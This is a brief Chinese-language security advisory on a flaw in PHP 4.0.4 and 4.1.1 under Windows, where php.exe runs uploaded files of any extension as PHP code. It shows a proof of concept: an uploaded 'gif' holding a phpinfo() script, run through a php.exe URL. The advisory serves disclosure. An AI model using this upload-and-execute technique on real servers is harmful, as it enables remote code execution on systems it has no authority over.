受影響系統:
PHP version 4.1.1 under Windows
PHP version 4.0.4 under Windows
漏洞描述:
在Windows下的PHP,通過PHP.EXE,攻擊者可以讓任何文件作為一個php文件,即使這個文件的擴展名不是php。比如,上傳一個文件,但是擴展名是mp3,txt,或者gif等等,然後要求PHP去執行它。
例如:
上傳一個gif文件,但是實際上是一個php腳本文件,文件內容如下:
#------------
phpinfo();
?>
#------------
然後攻擊者用PHP去執行:
http://www.example.com/php/php.exe/UPLOAD_DIRECTORY/huh.gif